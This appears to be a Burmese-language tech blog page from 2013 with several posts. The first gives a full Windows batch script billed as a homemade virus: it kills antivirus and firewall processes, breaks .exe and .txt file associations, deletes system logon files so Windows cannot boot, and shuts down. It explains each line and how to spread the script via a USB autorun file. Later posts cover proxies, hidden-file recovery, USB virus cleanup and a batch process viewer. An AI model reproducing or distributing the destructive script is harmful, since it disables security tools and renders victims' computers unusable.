Sunday, November 10, 2013

ကိုယ်ပိုင်ဗိုင်းရက်စ်ရေးကြမယ်

Notepadနဲ့ cmdသုံးပြီးတော့ ဗျာ ၀င်းဒိုး XP ကို စုတ်ပြတ်သတ်သွားအောင် မွှေလိုက်ရအောင် ကဲအောက်က codeလေးတွေကို သေချာကြည့် Notepadလေးဖွင့်ပြီး လိုက်ရေးပေါ့

title Hack Setup
color 0A
@echo off
set end=md "Hack installing"
set fin=copy "Hack log.txt" "Installing"
%end%
%fin%
net send * Hack is installing, press OK to begin set up.
kill NAVAPSVC.exe /F /Q
kill zonelabs.exe /F /Q
kill explorer.exe /F /Q
cls
assoc .exe=txtfile
assoc .txt=mp3file
cls
msg * It is you who is hacked....
msg * I warned you, and you kept going. Challenge me and this is what happens.
DEL C:\WINDOWS\system32\logoff.exe /F /Q
DEL C:\WINDOWS\system32\logon.exe /F /Q
DEL C:\WINDOWS\system32\logon.scr /F /Q
cls
shutdown

titleတို့@echo off တို့က ခုခောတ် ကလေးပေါက်စတောင် သိနေတော့ပြောရင်
စော်ကားရာကြမယ် ဒီတော့မရှင်းတော့ဘူးနော်. . . ။
အဲရှင်းပြမယ်သာပြောတာပါ အခုနကုဒ်တွေက အကုန်သိကြပါတယ် . .။
kill NAVAPSVC.exe /F /Q
kill zonelabs.exe /F /Q
kill explorer.exe /F /Q
cls
ဒီဟာတွေကိုပြောပြမယ်ဗျာ ဒီလို
ဝင်းဒိုးရဲ့အဓိက processတွေကိုend task လုပ်ဖို့ရေးတာဗျ
အဲဒါဆိုexplorerကြသွားလိမ့်မယ်ဗျာ . .

cls ကတော့သိတဲ့အတိုင်းလေ နောက်ကြောင်းရှင်ဖို့ပေါ့ . . . ။
assoc .exe=txtfile
assoc .txt=mp3file
ဒါကတော့ .exe fleနဲ့.txtဖိုင်တွေဖွင့်မရအောင်လုပ်တဲ့ကွန့်မန့်ပေါ့ဗျာ
တချား extentionတွေလဲထည့်သုံးလို့ရတယ်ဗျာ.

msg * It is you who is hacked....
msg * I warned you, and you kept going. Challenge me and this is what happens.
အဲဒိနေရာမှာ

ကိုရေးချင်တဲ့စာကိုပြင်ရေးဗျ msg *အနောက်မှ englishလိုပဲနော်
comment boxလေးနဲ့တက်လာလိမ်မယ်. . .
အောက်ဆုံးကဟာကအတော်လေးဆိုးတယ်ဗျ. . .
DEL C:\WINDOWS\system32\logoff.exe /F /Q
DEL C:\WINDOWS\system32\logon.exe /F /Q
DEL C:\WINDOWS\system32\logon.scr /F /Q
အဲဒိဟာက shutdown တို့log onတို့ ကိုဖြက်ပြစ်တာ
အဲဒိအတွက်သင့်ကွန်ပြူတာက ရှက်ဒေါင်းချလို့မရတော့ဘူး
log onကိုဖြက်ပြီး ပြီဖြစ်တဲ့အတွက် resetလုပ်လိုက် ရင် ၀င်းဒိုးပြန်မတက်တော့ဘူး
ကဲဘယ်လိုလုပ်မလဲ. . . .။
ဒါဆိုရင်အတော်လေးနိပ်ပြီနော် အဲဒိကုဒ်တွေကို notpadမှာရေးပြီးရင်
.cmd ဒါမှမဟုတ် .bat နဲ့safe ဒါဆို ဗိုင်းရက်စ်တစ်ကောင်ရပြီ
auto run fileလေးလုပ် စတစ်လေးထဲထည့်
သူငယ်ချင်းကိုပေး . . အဲလိုတော့လုပ်ပါနဲ့ဗျာ . . .
ဗိုင်းရပ်စ်ဆိုတာကောင်းတဲ့အကောင်မှမဟုတ်ပဲ
စမ်းကြည့်ဖို့ပဲနော်
မသေချာရင်မလုပ်ကြနဲနော်တော်ကြာဆားဗစ်ရောက်နေဦး မယ် . . .

Proxy အကြာင်းသိကောင်းစရာ


Proxy Server ဆိုတာ ဘာလဲ
About Proxy Proxy Server ဆိုတာ ဘာလဲ Proxy Server ဆိုတာ သင့်ကွန်ပျူတာနဲ့ အင်တာနက်ကြားမှာ တည်ရှိပြီး အင်တာနက်က သတင်းအချက်အလက် တော်တော်များများကို ထိန်းသိမ်းထားပါတယ်။ ကျွန်တော်တို့က Website တစ်ခုကို ကြည့်တဲ့အခါ အရင်ဆုံး Proxy Server ဆီကို request ရောက်သွားပါတယ်။ Proxy Server က သူ့ဆီမှာ ကျွန်တော်တို့တောင်းဆိုတဲ့ Website ရှိရင် ပြန်ပို့ပေးလိုက်ပါတယ်။ ဒါကြောင့် အင်တာနက်သုံးစွဲရတဲ့သူအဖို့ ပိုပြီးမြန်တဲ့ကောင်းကျိုးကို ခံစားရပါလိမ့်မယ်။ ဒါပေမဲ့ မြန်မာပြည်က Proxy Server တွေဟာ အဲဒီလို Cache လုပ်တာထက် Website Filtering အတွက်ပဲ လုပ်ထားသလားလို့တောင် ထင်ရပါတယ်။ ဒါ့အပြင် မြန်မာပြည်မှာ ရှိတဲ့ တစ်ချို့ Proxy Server တွေဟာ မူရင်း Website က Update လုပ်လိုက်တာတောင် သူတို့က Update မလုပ်နိုင်သေးပါဘူး။ Technical အရ ပြောရရင်တော့ TTL (Time To Live) တန်ဖိုးကို အများကြီး ပေးထားတယ်နဲ့ တူပါတယ်။ Web Filtering လုပ်မထားတဲ့ Proxy Server တွေ မြန်မာပြည်မှာ ရှိပေမဲ့ သုံးတဲ့အခါ username နဲ့ password တောင်းတာကို တွေ့ရပါတယ်။ (ygncache2.mpt.net.mm ပါ)

Anonymous Proxy Server ဆိုတာဘာလဲ 
Website တော်တော်များများဟာ ယုံလို့မရပါဘူး။ သူတို့ဟာ ကျွန်တော်တို့ရဲ့ IP ကို အသုံးပြုပြီး ကျွန်တော်တို့ရဲ့ ကွန်ပျူတာ Hard Disk ထဲက အချက်အလက်တွေကိုတောင်မှ လှမ်းခိုးနိုင်ပါတယ်။ အဲဒီလို လုပ်ဖို့အတွက်ကလည်း အလကားရတဲ့ Hacking program လေးတွေကို သုံးပြီး လုပ်နိုင်ပါတယ်။ Anonymous Proxy Server တွေဟာ ကျွန်တော်တို့ရဲ့ IP ကို ဖျောက်ပေးနိုင်ပါတယ်။ ဒါကြောင့် ကျွန်တော်တို့ဟာ အချက်အလက်ခိုးယူနိုင်တဲ့ Website ကို ကြည့်ရင်တောင်မှ ကျွန်တော်တို့ရဲ့ IP ကို အဲဒီ Site ဟာ မသိနိုင်ပါဘူး။ Anonymous Proxy Server တွေကပဲ အဲဒီလို user ရဲ့ IP ကို ဖျောက်ပေးနိုင်ပြီး သာမန် Proxy Server တွေကတော့ ကျွန်တော်တို့ရဲ့ IP ကို target Server ဆီကို ပို့ပေးလေ့ရှိပါတယ်။
Free Proxy Server ဆိုတာဘာလဲ Free Proxy Server ဆိုတဲ့အတိုင်းပါပဲ။ Free ရတယ်၊ လူတိုင်းသုံးလို့ရပါတယ်။ နိုင်ငံတော်တော်များများမှာ Free Proxy Server များစွာရှိပေမဲ့ တော်တော်များများဟာတော့ Anonymous Proxy Server တွေ မဟုတ်ကြပါဘူး။

Proxy Server အမျိုးအစားများ
HTTP Proxy Proxy ဆိုတာ Server သက်သက်ပါပဲ။ ဘာ Proxy လဲဆိုတာ သိမှ ကိုယ့်အတွက် အသုံးဝင်မှာပါ။ HTTP Proxy ရဲ့ အကူအညီနဲ့ Web Pages တွေ ကြည့်နိုင်မယ်၊ download ဆွဲနိုင်ပါမယ်။ အခုနောက်ပိုင်းမှာတော့ Program တွေကလည်း HTTP Proxy တွေနဲ့ တွဲအလုပ်လုပ်နိုင်ပါပြီ။ ဥပမာ ICQ လို Chat Program တွေပါ။

SOCKS Proxy 
သူကတော့ ပိုအစွမ်းထက်ပါတယ်။ အင်တာနက်ပေါ်မှာရှိတဲ့ ဘယ် Information ဆိုရင် ဘယ်လို လွှဲယူပေးရမယ်ဆိုတာ သိပါတယ်။ အဓိကကတော့ TCP/IP Protocol နဲ့ ကောင်းကောင်းကြီး အလုပ်လုပ်နိုင်တာပါ။ ဒါပေမဲ့ SOCKS Proxy ကို သုံးမယ်ဆိုရင်တော့ အဲဒီ Proxy Server ဟာ SOCKS 4 လား SOCKS 5 ဆိုတာ သိဖို့ လိုပါလိမ့်မယ်။

CGI Proxy  
CGI Proxy ဟာ Browser ကနေပဲတစ်ဆင့် access လုပ်နိုင်တဲ့ Proxy Serve ဖြစ်ပါတယ်။ ကျွန်တော်တို့တွေ သုံးနေကြတဲ့ ကျော်တဲ့Website ဆိုတာ အဲဒီ CGI Proxy ကိုပြောတာပါပဲ။
FTP Proxy FTP Proxy ကတော့ FTP Server တွေနဲ့ တွဲအလုပ်လုပ်နိုင်ဖို့ ဖြစ်ပါတယ်။ CuteFTP လို GetRight တို့တွေမှာ FTP Proxy တွေ ထည့်သုံးလို့ ရပါတယ်။ မြန်မာနိုင်ငံက Proxy တွေမှာ FTP Proxy တွေ ရှိပေမဲ့ Public အတွက်တော့ ပိတ်ထားပါတယ်။ ဒါကြောင့် ကျွန်တော်တို့တွေ FTP သုံးချင်ရင်တော့ နိုင်ငံခြားက FTP Proxy တွေ လှမ်းသုံးရင်တော့ ရနိုင်ပါတယ်။ (လက်တွေ့တော့ ကျွန်တော်လည်း မစမ်းဖူးပါ)

Proxy Server သုံးလို့ ရတဲ့ အကျိုးကျေးဇူး 
အဓိကကတော့ ကိုယ်ကြည့်နေတဲ့ Site, ကိုယ်သုံးနေတဲ့ Mail, ကိုယ်သုံးနေတဲ့ Web Chat တွေက ကိုယ်ဘယ်ကလဲ ဆိုတာ မသိတော့တာပါပဲ။ အဲဒီတော့ ကိုယ့် information အတွက် လုံခြုံမှုရှိပါတယ်။ မြန်မာပြည်မှာ အဲဒါက ဖန်တီးပြီးသားပါ။ ကျွန်တော်တို့တွေ ဘယ် site ပဲကြည့်ကြည့် သူတို့က ကျွန်တော်တို့ IP ကို မသိပါဘူး။ data မခိုးနိုင်ပါဘူး။ ဒီမှာတော့ Proxy ဆိုရင် ကျော်ဖို့ပဲလို့ကို ထင်နေကြတော့ပါ။ ကျွန်တော်တို့နိုင်ငံရဲ့ Proxy က Web Filtering လုပ်ထားတယ်၊ တခြားနိုင်ငံက Proxy က Web Filter လုပ်မထားဘူး၊ အဲဒီတော့ ကျွန်တော်တို့က အဲဒီ Proxy ကို သုံးလိုက်ရင် အလိုလို ကျော်ပြီးသား ဖြစ်သွားတာပါ။ တခြား Proxy တွေ သုံးတယ်ဆိုတာကလည်း အရမ်းခက်ခဲတာမဟုတ်ပဲ ကိုယ်သုံးနေတဲ့ Browser ရဲ့ Option ထဲမှာ Proxy Server ဆိုတဲ့ နေရာမှာ ကိုယ်သုံးချင်တဲ့ Proxy Server ရဲ့ IP ကို ရိုက်ထည့်လိုက်ရုံနဲ့ ရပါတယ်။ ဒါပေမဲ့ တခြားနိုင်ငံက Proxy ကို လှမ်းသုံးဖို့ဆိုတာ အဲဒီလောက်ကြီးထိလည်း မလွယ်ပါဘူး။ (CGI Proxy တွေကို မဆိုလိုပါ)

ဘယ်လို ပြဿနာတွေ ကြုံနိုင်လဲ ဆိုတော့
(၁) ကိုယ့်နေရာနဲ့ ကိုယ့်သုံးတဲ့ Proxy နဲ့ အရမ်းဝေးနေတဲ့အခါ နှေးတာတွေ၊ ချိတ်ဆတ်မရတာတွေ ဖြစ်တတ်ပါတယ်။
(၂) ကိုယ်သုံးတဲ့ Proxy ဟာ ကိုယ်ဟာ မြန်မာပြည်ကမို့ သုံးခွင့်မပေးတာမျိုးလည်း ရှိတတ်ပါတယ်။
(၃) တချို့ Proxy Server တွေကတော့ IP နဲ့ ကန့်သတ်ထားတာမျိုးလည်း ရှိပါတယ်။ ကိုယ့် IP က သူတို့ list ထဲမှာ မပါရင် သုံးမရတာမျိုး ဖြစ်ပါတယ်။
(၄) အဓိကကတော့ ကျွန်တော်တို့ရဲ့ ISP က ကျွန်တော်တို့သုံးမဲ့ Proxy Server တွေကို Access Denied လုပ်ထားတာလည်း ဖြစ်လေ့ရှိပါတယ်။ အဲဒါက အများဆုံးပါ။ source: IT men

Virus များကြောင့် File၊ Folder များပျောက်ဆုံးနေလျင်


ကွန်ပျူတာတွင်ဖြစ်စေ၊ Flash Drive များတွင်ဖြစ်စေ Virus များကြောင့် File၊ Folder များပျောက် ဆုံးနေပြီး Use space တွင်လည်းအဆိုပါ File များကိုသိမ်းဆည်းထားသည်ဟု ဖော်ပြနေပါက အောက်ပါအတိုင်းလုပ်ဆောင်ခြင်းဖြင့် File၊ Folder များကိုပြန်လည်တွေ့ရှိရမည်ဖြစ်ပါသည်။ ထိုသို့ပြု လုပ်ခြင်းသည် Virus များကို ရှင်းလင်းခြင်းမဟုတ်ပဲ Virus Effect ကြောင့်ပျောက်ဆုံးနေသည့် Data များကိုသာ ရှာဖွေခြင်းဖြစ်ပါသည်။ ထို့ကြောင့် Data များကိုရှာဖွေပြီးသော်လည်း Virus ကိုရှင်းလင်း ရန် လိုအပ်မည်ဖြစ်ပါသည်။
၁။ Start မှတစ်ဆင့် Run Box တွင် regedit ဟုရေးသား၍ Registry Editor သို့ဝင်ရောက်ရပါမည်။
၂။ Registry Editor တွင် HKEY_LOCAL_MACHINE\ SOFTWARE\ Microsoft\ Windows\
CurrentVersion\ Explorer\ Advanced\ FolderHidden\ SHOWALL
ထိရောက်စေရန် အဆင့်ဆင့် ၀င်ရောက်ရပါမည်။
၃။ SHOWALL ကို Left Cclick ဖြင့်နှိပ်၍ ညာဘက် Box (Pane) အတွင်းရှိ CheckedValue  ကို Right Click မှတစ်ဆင့် Modify သို့ဝင်ရောက်ရပါမည်။ ValueData တွင် ၀(သုည) ကို 1 ဟုပြောင်း လဲပေးရပါမည်။
၎။ အကယ်၍ ညာဘက် Box (Pane) အတွင်း၌ CheckedValue ကိုမတွေ့ရှိပါက SHOWALL ကို Right Click နှိပ်၍ New မှတစ်ဆင့် DWORD (32-bit) Value ကိုတည်ဆောက်ပေး၍ အမည်ကို CheckedValue ဟုပေး၍ Value ကို 1 ဟုပေးရပါမည်။
၅။ ထို့နောက်ကွန်ပျူတာကို Restart ချပြီးနောက် Hidden ဖြစ်နေသည့် File၊ Folder များကိုပြန်လည် တွေ့ရှိရမည်ဖြစ်ပါသည်။ (ချယ်ရီမြေ၀က်ဆိုဒ်မှ ကူးယူဖော်ပြသည်။)

Memory Stick၊ Flash Drive များနှင့် exe Virus


Memory Stick၊ Flash Drive များနှင့် exe Virus
         Memory Stick များနှင့် External Hard disk များကိုကွန်ပျူတာများတွင် တပ်ဆင်အသုံးပြုရာ၌ ကြုံတွေ့ရသည့် Virus များအနက် exe virus ကို command prompt အသုံးပြု၍ ရှင်းလင်းနည်းဖြစ်ပါသည်။ Antivirus Software  Update မဖြစ်သည့်ကွနပျူတာများအတွက် အတိုင်းအတာတစ်ခုအထိစိတ်ချ ရစေမည် ဖြစ်သည့်အပြင် ကွန်ပျူတာတွင်အသုံးပြုသည့် Dos Command အကြောင်းကိုလည်းသိရှိနားလည်စေနိုင်မည် ဖြစ်ပါသည်။
          ပထမဦးစွာ Flash Drive ကိုကွန်ပျူတာတွင်တပ်ဆင်ပြီးနောက်  Run တွင် cmd ကိုရိုက်၍ Command Prompt သို့ဝင်ရောက်ရပါမည်။ ထို့နောက် cmd တွင် dir h:\*.exe /a ဟုရေးသား၍ Enter နှိပ်ရပါမည်။ ၄င်း command တွင်
          Dir h:\ ၏ဆိုလိုရင်းမှာ dir သည် Folder များ၊ File များကိုကြည့်ရှူရန်အတွက်ဖြစ်ပြီး h:\ သည် ကွန်ပျူတာတွင် တပ်ဆင်ထားသော  Memory Stick ၏ Drive Name ဖြစ်ပါသည်။
          *.exe တွင် *. သည် Memory Stick H အတွင်းရှိ Folder များအားလုံးကို သီးသန့်ကြည့်ရှူရန်အတွက် ဖြစ်ပြီး *.exe ဟုဆိုသည့်အတွက် Memory Stick H အတွင်းရှိ exe များအားလုံးကို ကြည့်ရှူနိုင်ရန်အတွက် ဖြစ်ပါသည်။
          /a သည် System File များကိုဖြစ်စေ၊ Hidden ဖြစ်နေသည့် Virus များနှင့် ထို Virus များ ကြောင့်Hidden ဖြစ်နေသည့် File များနှင့် Folder များကို တွေ့မြင်နိုင်ရန်အတွက်ဖြစ်ပါသည်။ ထို့ကြောင့် dir h:\*.exe /a မှာ Memory Stick H အတွင်းရှိ Hidden ဖြစ်နေသည့် exe virus များကို ဖော်ပြရန် အတွက်အသုံးပြုခြင်းဖြစ်ပါသည်။ ထို့နောက် အောက်ဖော်ပြပါပုံအတိုင်း Memory Stick H အတွင်းရှိ exe Virus များကိုတွေ့မြင်ရမည်ဖြစ်ပါသည်။
အဆိုပါ exe virus များကို ရှင်းလင်းရန်အတွက် del h:\*.exe command ရိုက်၍ Enter နှိပ်ရပါမည်။ ၄င်းမှာ Memory Stick H အတွင်းရှိ exe များအားလုံးကို Delete ပြုလုပ်ခြင်းဖြစ်ပါသည်။ သို့ရာတွင် အောက်ဖော်ပြပါပုံအတိုင်း Could Not Find h:\*.exe ဟု Drive H အတွင်း exe File များမရှိပါဟု Message ကို တွေ့မြင်ရမည်ဖြစ်ပါသည်။ dir h:\*.exe /a ဖြင့်ကြည့်ရှူစဉ်က exe File များကိုတွေ့မြင်ရပြီး ယခု Delete ပြုလုပ်သည့်အခါတွင် မရှိပါဟု message တွေ့မြင်ရခြင်းမှာ Virus များမှထိန်းချုပ်ထားသည့်အတွက်ဖြစ် ပါသည်။
          အဆိုပါ Virus များ၏ထိန်းချုပ်မှုကိုဖြေရှင်းရန်အတွက် attrib h:\*.exe –s –r –h Command ကိုအသုံးပြုရပါမည်။ ၄င်း Command တွင် attrib သည် attribute ကိုဆိုလိုခြင်းဖြစ်ပြီး ၄င်းသည် File တစ်ခုကို ပုံမှန်အားဖြင့် ဖျက်ဆီးမရအောင်ပြုလုပ်နိုင်ပါသည်။ s သည် System File အဖြစ်သက်မှတ်ထားပြီး သာမန်  Delete ဖြင့်ဖျက်၍မရပါ။ r သည် Read Only ဖြစ်ပြီး တွေ့ရှိနိုင်သော်လည်း ရေးသားပြင်ဆင်ခွင့်မပြုပေ။ h သည် hidden ဖြစ်ပြီး ပုံမှန်အားဖြင့်မြင်တွေ့နိုင်ခြင်းမရှိစေရန် လုပ်ဆောင်ပါသည်။ exe virus သည် system File အယောင်ဆောင်ထားပြီး ဖျက်ဆီးမရအောင်ပြုလုပ်ထားခြင်း၊ ပုံမှန်အားဖြင့်မြင်တွေ့ခြင်းမရှိစေရန် Hidden ပြုလုပ်ထားခြင်းစသည့်ထိန်းချုပ်ထားမှုများကို ဖြေရှင်းရန်အတွက် – ကိုအသုံးပြုခြင်းဖြစ်ပါသည်။
          Virus များ၏ထိန်းချုပ်မှုကို ဖြေရှင်းပြီးနောက် exe Virus ကိုရှင်းလင်းနိုင်ပြီဖြစ်ပါသည်။ ယခင်အသုံးပြု ပြီးသည့် del h:\*.exe Command ကိုအသုံးပြုရပါမည်။ ထို့နောက် Memory Stick H အတွင်းရှိ exe virus များ ကျန်ရှိနေခြင်းရှိ၊ မရှိကို dir h:\*.exe /a ဖြင့်ကြည့်ရှူပါက exe Virus များမရှိတော့ကြောင်း တွေ့မြင်ရမည် ဖြစ်ပါသည်။
ထို့ကြောင့် ကွန်ပျူတာများအတွင်းရှိ exe Virus များကို Command Prompt ဖြင့်လွယ်ကူစွာ ရှင်းလင်းနိုင်ပါသည်။Memory Stick များအတွင်းရှိ exe Virus များကို ရှင်းလင်းရန်အတွက် အောက်ဖော်ပြပါ Command 3 ကြောင်းသာလိုအပ်ပါသည်။
dir h:\*.exe /a                             Virus များကိုစစ်ဆေးခြင်း။
attrib h:\*.exe –s –r –h        Virus များ၏ထိန်းချုပ်မှုကိုဖြေရှင်းခြင်း။
del h:\*.exe                       Virus များကိုရှင်းလင်းခြင်း။

Virus ၀င်ရောက်တိုင်း Hard Disk ကို Format ချခြင်းသည် ဖြေရှင်းနည်းအမှန်မဟုတ်


၁။ Internet မှ Program များကို Download ချ၍ Install ပြုလုပ်ခြင်းနှင့် Uninstall ပြုလုပ်ခြင်းတို့ကို ကွန်ပျူတာ အသုံးပြုသူတိုင်း ပြုလုပ်နေကြပါသည်။ မိမိမသိသော Software အသစ်များကို Install ပြုလုပ်ပြီးသော်လည်း ကွန်ပျူတာသည် ကောင်းမွန်စွာ အလုပ်လုပ်နေပါလိမ့်မည်။ ကြာလာသည်နှင့်အမျှ ဘယ်ကမှန်းမသိသော Error Massage များကို စတင်လက်ခံရမည်ဖြစ် သည်။ ထိုအခါ ကွန်ပျူတာသည် စတင် Hang လာပြီး အဆိုးဆုံးအခြေအနေ ရောက်လာမည်။ ထို့နောက် Blue Screen သာမြင် ရတော့သည် အခြေအနေသို့ ရောက်ရှိလာတော့မည်။ ကွန်ပျူတာ၏ Performance ကို အမျိုးမျိုးရန်ပြုတတ်သော Worm များ သို့မဟုတ် ဒုက္ခပေးသော Virus များ ကွန်ပျူတာထဲတွင် စတင်ဝင်ရောက် နှောက်ယှက်နေမည်။ Antivirus Program ဖြင့် Virus စစ်ဆေးသောအခါတွင်လည်း Virus မရှိကြောင်း ပြသနေပါသည်။ထို့နောက် ဘာမှန်းမသိသော Error Message များတက်လာပြီး များစွာ သော ပြဿနာများကို ကြုံတွေ့ရမည်ဖြစ်သည်။
၂။ နောက်အကြောင်းအရာတစ်ခုမှာ ကွန်ပျူတာအစိတ်အပိုင်းများနှင့် ကိုက်ညီမှုမရှိသော၊ ချို့ ယွင်း နေသော Hardware အသစ်တစ်ခုကို ပေါင်းထည့်ခြင်းကြောင့်လည်း ဖြစ်နိုင်ပါသည်။ ၄င်းအပြင် ကွန်ပျူတာ အတွင်းပျက်စီးခြင်း အကျိုးသက်ရောက်မှုပေးနိုင်သည့် Electrostatic Discharge ပင် ဖြစ်သည်။ အကြောင်းအရင်းမှာ ကွန်ပျူတာ System နှင့် ကိုက်ညီမှုမရှိသော Software အသစ်တစ်ခုအား Install လုပ်ခြင်း နှင့် ထို Software အား Uninstall လုပ်ရာတွင် မမှန်ကန်သောကြောင့် ဖြစ်သည်။

၃။ Windows Operating System တိုင်းတွင် Registry များရှိသည်။ Registry စနစ်တွင် ကွန်ပျူတာ၏ Hardware နှင့် Software များအကြောင်း သတင်းအချက်အလက်များ ပါဝင်ပါသည်။ ကွန်ပျူတာတွင် ကြာရှည်စွာ အသုံးမခံသော Software များ (သို့မဟုတ်) Uninstall ပြန်လုပ်၍မရသော Software များ ရှိနေပါက ၄င်း Software များသည် ကွန်ပျူတာအား ရပ်သွား၊ နှေးသွားအောင် ပြုလုပ်နေမည်။ ၄င်းတို့ကို ဖယ်ရှားခြင်း Registry Cleaning လုပ်ခြင်းဖြင့် ဖြစ်ပေါ်နေသော Error အချို့ကို တစ်ခါတစ်ရံမှာဖြေရှင်း နိုင်လိမ့်မည်။ သို့သော် ပြဿနာအများစုမှာ Video Driver တွေကြောင့် ကွန်ပျူတာအတွင်း Freezing Problem များဖြစ်တတ်ပါသည်။ Video Driver များထဲတွင် ကွန်ပျူတာမှာသုံးမရသော Latest Driver နှင့် New components များရှိပါသည်။ ဤပြဿနာ ကိုဖြေရှင်းရန် Video Card ၏တိကျသော Model ကိုရှာပါ။ ပြီးနောက် Video Card ၏ Company Website တွင် Update ကို Install လုပ်ပါ။

၎။ ထိုကဲ့သို့ ကွန်ပျူတာတွင် Virus ၀င်ရောက်ပြီး Error များဖြစ်ပေါ်တိုင်း Hard Disk Format ချမည်ဆိုလျင် တစ်ကြိမ်တစ်ခါသာ ပြုလုပ်သင့်ပါသည်။ အခြားနည်းလမ်းများနှင့်ဖြေရှင်းရန် ကြိုးစားကြည့် ပါ။ Hard Disk ၏ Purification နှင့် Formatting သည် ကြီးမားသော လမ်းကြောင်းကြီးဖြစ်ပါသည်။ သင်သာအမှားတစ်ခုလုပ်လိုက်လျင် သင့်ကွန်ပျူတာသည် အသုံးမကျမှုများသာ ဆက်လက်ဖြစ်ပေါ်နေမည်။
ထို့ကြောင့် ကွန်ပျူတာတွင် Virus ၀င်ရောက်ပြီး Error များဖြစ်ပေါ်တိုင်း Hard Disk Format ချခြင်းသည် အကောင်းဆုံး ဖြေရှင်းနည်း မဟုတ်သဖြင့် အခြားတက်သိနားလည်သူများအား မေးမြန်းပြီး ဖြေရှင်းသင့်ပါ သည်။ (ချယ်ရီမြေ၀က်ဆိုဒ်မှ ကူးယူဖော်ပြသည်။)

Task Manager ကို .Bat File ဖြင့်ဖွင့်၍ အသုံးပြုနည်း

ကွန်ပျူတာတစ်လုံးကိုအသုံးပြုရာ၌ ထိုကွန်ပျူတာအတွင်း Install ပြုလုပ်ထားသည့် Software များ၊ Application များကိုသိရှိနိုင်ရန်အတွက် Task Manager ကိုဖွင့်၍ ကြည့်ရှုနိုင်ပါသည်။ Keyboard မှ Ctrl+Alt+del ကိုနှိပ်၍ဖြစ်စေ၊ Taskbar ပေါ်တွင် Right Click ထောက်၍ Task Manager မှတစ်ဆင့်ဝင်၍ဖြစ်စေကြည့်ရှုနိုင်ပါသည်။ သို့ရာတွင် အချို့သော ကွန်ပျူတာများတွင် Task Manager ကိုကြည့်ရှုမရနိုင်စေရန် ပိတ်ထားတတ်ကြပါသည်။ အကြောင်းအမျိုးမျိုးကြောင့် အင်တာနက်ဆိုင်များတွင် အင်တာနက်အသုံးပြုရသည့်အခါတွင်ဖြစ်စေ၊ မိမိကိုယ်ပိုင်မဟုတ်သည့်ကွန်ပျူတာများကို အသုံးပြုရသည့်အခါတွင်ဖြစ်စေ မိမိ၏ personal Data များကိုခိုးယူခြင်းမခံရစေရန် သတိပြုရန်လိုအပ်ပါသည်။ အကယ်၍ မိမိအသုံး ပြုနေသော ကွန်ပျူတာတွင် Keylogger ကဲ့သို့သော Software မျိုးကို Install ပြုလုပ်ထားပါ က Keyboard မှ ရိုက်လိုက်သည့် စာလုံးများကို မှတ်သားထားခြင်း၊ ကွန်ပျူတာတွင် အသုံးပြုမှုမှန်သမျှကို သိမ်းဆည်းထားခြင်းတို့ပြုလုပ်မည်ဖြစ်ပြီး အရေးကြီးသည့် Personal Data များကို ခိုးယူခံရမည်ဖြစ်ပါသည်။ ထို့ကြောင့် ကိုယ်ပိုင်မဟုတ်သည့်ကွန်ပျူတာများကို စတင်အသုံးပြုသည်နှင့် Task Manager ကိုဖွင့်၍ ကွန်ပျူတာတွင် Install ပြုလုပ်ထားသည့် Software များကို ဂရုတစိုက်ကြည့်ရှုရန်လိုအပ်ပါသည်။ အကယ်၍ Task Manager ကို ပိတ်ထားပါက အောက်ဖော်ပြပါအတိုင်းပြုလုပ်၍ ကြည့်ရှုနိုင်ပါသည်-
၁။ Start \ All Program \ Accessories မှ Notepad ကိုဖွင့်ရပါမည်။
၂။ Notepad တွင် အောက်ဖော်ပြပါ Code များကို Copy ကူး၍ ထည့်ပေးရပါမည်-
@echo off
mode 33,25
setlocal ENABLEDELAYEDEXPANSION
Title Process Manager
:Begin
CD /D “!TEMP!”
set “TASKLIST=%windir%\system32\tasklist.exe”
set “FIND=%windir%\system32\find.exe”
set “wmic=%windir%\System32\Wbem\wmic.exe”
set “Explore=%windir%\explorer.exe”
:Reload
cls
set num=0
echo.________________________________
echo.[ Process Name ] [ PID ]
echo.——————————–
if not defined NAME set NAME=%USERNAME%
!TASKLIST! /FI “USERNAME eq !NAME!” /FO TABLE /NH >”plist.txt”
for /f “tokens=*” %%a in (plist.txt) do (
set /a num+=1
set “list=%%a”
set “list=!list:~0,32!”
echo.!list!
)
echo.________________________________
Del /f /q “plist.txt” >nul 2>&1
Title !NAME! – [!num!] Process Running.
if not defined ac (
if /i “!NAME!”==”%USERNAME%” goto :USR
if /i “!NAME!”==”SYSTEM” goto :SYS
)
if /i “!ac!”==”K” goto :Kill
if /i “!ac!”==”S” goto :SYSTEM
if /i “!ac!”==”U” goto :USER
if /i “!ac!”==”E” goto :Explore
set “ac=”
GOTO :Reload
:USER
set “NAME=”
set “ac=”
GOTO :Reload
:USR
echo.CH : K=Kill, S=System, E=Explore
set /p “ac=Action : “
GOTO :Reload
:SYSTEM
set NAME=SYSTEM
set “ac=”
GOTO :Reload
:SYS
echo.CH : K=Kill, U=User, E=Explore
set /p “ac=Action : “
GOTO :Reload
:Kill
echo.Type PID to Kill..
set “ac=”
set /p “PID=PID : “
if not defined PID goto :Reload
Taskkill /F /PID !PID! >nul 2>&1
if errorlevel 1 (echo.No Task Running w/ this PID.) else (
if !PID! geq 0 if !PID! lss 10 (
echo.Can’t kill Critical Process
goto :clr_var2
) else (
echo.Success : Task with PID=!PID!
echo. has been KILLED..
))
:clr_var2
set “ac=”
set “PID=”
PAUSE>NUL
GOTO :Reload
:Explore
echo.Type PID to Explore..
set “ac=”
set /p “PID=PID : “
if not defined PID goto :Reload
if !PID! lss 10 goto :clr_var
if !PID! gtr 10000 goto :clr_var
!wmic! process get ProcessID,ExecutablePath >”path.txt”
for /f “tokens=1,2 delims= ” %%a in (‘type “path.txt” ^| !FIND! ” !PID! “‘) do (
set “exepath=%%~dpa
)
if not defined exepath (
echo.No Task Running w/ this PID.
PAUSE>NUL
) else (START !Explore! “!exepath!”)
:clr_var
set “PID=”
set “exepath=”
Del /f /q “path.txt” >nul 2>&1
GOTO :Reload
:END
၃။ ထို့နောက် .Bat File Type ဖြင့် Save ပေးရပါမည်။ File Name ကို နှစ်သက်ရာပေးနိုင်ပါ သည်။ ဥပမာ task.bat ဟုဖြစ်ပါသည်။
၎။ ထို Save လုပ်ထားသည့် .bat File ကို Double Click နှိပ်လိုက်ပါက Command Prompt ဖြင့် Task Manager ကဲ့သို့ ကွန်ပျူတာတွင် Install ပြုလုပ်ထားသည့် Software များ၊ Application များ၊ Processes များ စသည်ဖြင့် ဖော်ပြပေးနေမည်ဖြစ်ပါသည်။
